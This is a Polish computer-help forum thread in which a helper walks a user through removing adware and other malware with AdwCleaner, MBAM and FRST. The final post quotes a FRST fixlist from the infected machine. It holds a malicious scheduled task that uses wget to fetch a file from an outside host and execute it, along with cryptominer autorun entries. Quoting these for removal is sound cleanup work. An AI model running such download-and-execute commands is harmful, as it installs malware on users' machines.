Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Wooden Sea Ads - uciążliwe reklamy

lukas1000s 20 Cze 2015 18:17 480 8
  • #1 20 Cze 2015 18:17
    lukas1000s
    Poziom 8  

    Witam. Mam problem z wyzej wymienionym wirusem. Caly czas zaśmieca mi przeglądarke reklamami i nie mogę normalnie korzystać z internetu. Czy mógłby ktoś mi z nim pomóc? W załącznikach załączam logi. Pozdrawiam.

    0 8
  • #2 20 Cze 2015 18:32
    Acorus 20
    Spec od komputerów

    Odinstaluj CinemaPlus-4.5vV18.06, HD Cinema Pro 1.8cV19.06, Phrase Finder 1.10.0.9,SavePass 1.1. Pobierz i uruchom jako administrator AdwCleaner https://toolslib.net/downloads/finish/1/ Kliknij Scan i później Cleaning.
    Pokaż nowe logi z FRST.

    0
  • #3 20 Cze 2015 21:44
    lukas1000s
    Poziom 8  

    Niestety Pojawiają się problemy. Pierwszy z nich to taki, iż nie moge usunąc podanych programów. Wybieram 'Odinstaluj' i nie ma zadnej reakcji. Drugim problemem jest taki: gdy wybieram opcje skanuj w AdwCleaner wyskakuje komunikat ze program przestał dzialac i musi zostac zamkniety.. Nie mam pojęcia co teraz z tym zrobić..

    0
  • #5 21 Cze 2015 09:35
    Acorus 20
    Spec od komputerów

    Wykonaj skan w trybie awaryjnym.

    0
  • #6 21 Cze 2015 12:33
    lukas1000s
    Poziom 8  

    Wykonać skan w trybie awaryjnym w AdwCleaner czy za pomocą MBAM? Jeśli chodzi o AdwCleaner, to w trybie awaryjnym tez skan nie chce działać i program się wyłącza.

    0
  • #7 21 Cze 2015 12:52
    Acorus 20
    Spec od komputerów

    Przeskanuj MBAM w normalnym trybie i pokaż nowe logi z FRST.

    0
  • #9 22 Cze 2015 09:45
    Acorus 20
    Spec od komputerów

    Otwórz notatnik systemowy i wklej:

    Cytat:
    CloseProcesses:
    Task: {023C590C-7D52-4FAD-95CD-9359F2AE5D27} - System32\Tasks\{7B540AF7-0966-474F-8B5D-27D522D2E4FB} => pcalua.exe -a C:\Users\Łukasz\AppData\Roaming\oursurfing\UninstallManager.exe -c -ptid=amt
    Task: {32994DC6-A9D9-4384-B0C2-C437741BA427} - \SmartWeb Upgrade Trigger Task No Task File <==== ATTENTION
    Task: {4186A039-4F1C-4013-B4F6-A478EDDCF869} - System32\Tasks\{AF6A82A6-556A-4AB0-B740-71224A12EC6D} => pcalua.exe -a C:\Users\Łukasz\AppData\Roaming\mystartsearch\UninstallManager.exe -c -ptid=cmi
    Task: {EB18A008-5F5A-4CC4-969A-9AB2B5E30600} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 300 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=O8oT5UIHmS;Minecraft_1.8.1_Setup.exe;1420990900 &amp; start cmd /R dat.bmp <==== ATTENTION
    Task: C:\Windows\Tasks\xgKF5w8h6VWKdOARzAqx2IFJaJG.job => C:\Users\ý˙ukasz\AppData\Roaming\xgKF5w8h6VWKdOARzAqx2IFJaJG.exe <==== ATTENTION
    Task: C:\Windows\Tasks\xtoCcUmK3bzpH.job => C:\Users\ý˙ukasz\AppData\Roaming\xtoCcUmK3bzpH.exe <==== ATTENTION
    HKLM\...\Run: [gpuminer] => C:\Users\Łukasz\AppData\Roaming\cpuminer\sgminer\sgminer.cmd [96 2015-05-02] ()
    HKLM\...\Run: [cpuminer] => C:\Windows\system32\cpuminer-gw64.exe [4240568 2015-06-17] ()
    GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
    SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-2235921430-1639336870-3348238760-1001 -> DefaultScope {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL =
    StartMenuInternet: IEXPLORE.EXE - iexplore.exe
    CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - https://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - https://clients2.google.com/service/update2/crx
    2015-06-21 13:16 - 2015-06-21 13:16 - 00000000 ____D C:\Users\Łukasz\Downloads\FRST-OlderVersion
    2015-06-20 16:36 - 2015-06-20 16:36 - 00003146 _____ C:\Windows\System32\Tasks\{AF6A82A6-556A-4AB0-B740-71224A12EC6D}
    2015-06-20 16:36 - 2015-06-20 16:36 - 00003140 _____ C:\Windows\System32\Tasks\{7B540AF7-0966-474F-8B5D-27D522D2E4FB}




    2015-06-20 16:29 - 2015-06-20 16:29 - 00000000 ____D C:\Program Files (x86)\predm
    2015-06-20 15:33 - 2015-06-20 18:03 - 00000000 ____D C:\Users\Łukasz\AppData\Roaming\systweak
    2015-06-20 15:31 - 2015-06-20 17:51 - 00000000 ____D C:\Program Files (x86)\6ecffdd7-08ef-47ca-9d68-59437a3d1717
    2015-06-20 10:19 - 2015-06-20 16:30 - 00000000 ____D C:\Program Files (x86)\MiniGet
    2015-06-20 10:19 - 2015-06-20 10:19 - 00000000 ____D C:\Users\Łukasz\AppData\Roaming\MiniGet
    2015-06-20 09:50 - 2015-06-21 13:42 - 00000000 ____D C:\Program Files (x86)\4c36d519-fef0-48e4-96a6-5e684a0a49ca
    2015-06-20 09:50 - 2015-06-20 09:50 - 00001038 _____ C:\Windows\Tasks\xgKF5w8h6VWKdOARzAqx2IFJaJG.job
    2015-06-20 09:49 - 2015-06-20 09:49 - 00001010 _____ C:\Windows\Tasks\xtoCcUmK3bzpH.job
    2015-06-20 09:47 - 2015-06-21 13:42 - 00000000 ____D C:\Program Files (x86)\ff8a955b-fb3f-45ef-972a-2717e5ebc998
    2015-06-20 09:47 - 2015-06-21 13:42 - 00000000 ____D C:\Program Files (x86)\b16e7efe-b4a8-466f-a226-d3996dfdfb5b
    2015-06-20 09:45 - 2015-06-21 12:12 - 00000000 ____D C:\Program Files (x86)\globalUpdate
    2015-06-20 09:45 - 2015-06-20 09:45 - 00000000 ____D C:\Users\Łukasz\AppData\Local\globalUpdate
    2015-06-20 09:37 - 2015-06-20 09:37 - 00000000 ____D C:\Users\Łukasz\AppData\Roaming\cpuminer
    2015-06-17 22:00 - 2015-06-17 22:00 - 04240568 _____ C:\Windows\system32\cpuminer-gw64.exe
    2015-06-17 21:29 - 2015-06-17 21:29 - 00000230 _____ C:\Windows\system32\cpuminer-conf.json
    2015-06-20 21:40 - 2015-03-20 11:33 - 00000000 ____D C:\AdwCleaner
    2015-03-20 11:42 - 2015-06-10 21:53 - 0000005 _____ () C:\Program Files (x86)\is.dat
    2015-03-20 11:42 - 2015-03-20 11:42 - 0016384 _____ () C:\Program Files (x86)\uik.dat
    2015-04-19 14:20 - 2015-04-19 14:20 - 0005872 _____ () C:\Users\Łukasz\AppData\Roaming\xgKF5w8h6VWKdOARzAqx2IFJaJG
    2015-04-19 14:20 - 2015-04-19 14:20 - 0005872 _____ () C:\Users\Łukasz\AppData\Roaming\xtoCcUmK3bzpH
    EmptyTemp:


    Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze.
    Uruchom jako administrator FRST i kliknij w Fix.

    0